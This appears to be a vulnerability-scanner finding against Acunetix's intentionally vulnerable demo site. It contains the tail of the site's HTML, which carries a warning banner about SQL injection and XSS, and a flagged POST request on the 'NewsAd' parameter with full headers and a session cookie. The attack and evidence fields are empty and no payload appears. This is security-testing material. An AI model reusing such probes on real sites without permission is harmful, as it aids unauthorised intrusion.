vulnerabilities</strong><br /> SQL injection is a hacking technique which modifies SQL commands in order to gain access to data in the database. Cross site scripting attacks allow a hacker to execute a malicious script on your visitors' browser. Acunetix Web Vulnerability Scanner can check if your web application is vulnerable to both of these attacks. More information about cross site scripting & SQL injection at our website security info page.</p> <p><strong>Acunetix Web Vulnerability Scanner also checks for the following web attacks:</strong></p> <ul> <li>CRLF injection attacks<br /> </li><li>Code execution attacks<br /> </li><li>Directory traversal attacks<br /> </li><li>File inclusion attacks<br /> </li><li> Input validation attacks<br /> </li><li>Authentication attacks.</li> </ul> <p><strong>Advanced penetration testing tools</strong><br /> Acunetix WVS also includes tools such as an HTTP editor & HTTP sniffer to allow customization of web vulnerability checks. Using the Vulnerability editor, new attacks can easily be created.</p> <p><strong>Pricing & availability</strong><br /> Acunetix WVS is available as an enterprise or as a consultant version. A subscription based license can be purchased for as little as $395, whereas a perpetual license starts at $2995. For more information visit our pricing page.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=2
Method	POST
Parameter	NewsAd
Attack
Evidence
Show / hide Request and Response
Request Header - size: 464 bytes.	POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=2 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2 Content-Length: 10945 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 10,945 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc%2BQWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BNTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BRmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BJnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc%2BPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk%2BPGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk%2BIDwvdWw%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjBQxhZHMvZGVmLmh0bWxkZCqQXr9Bo%2Bfii5vVAAhGyfGRVNk1&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwLjj6S6DAL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBJXwOObHp1dq30nemUavTDCszjxx
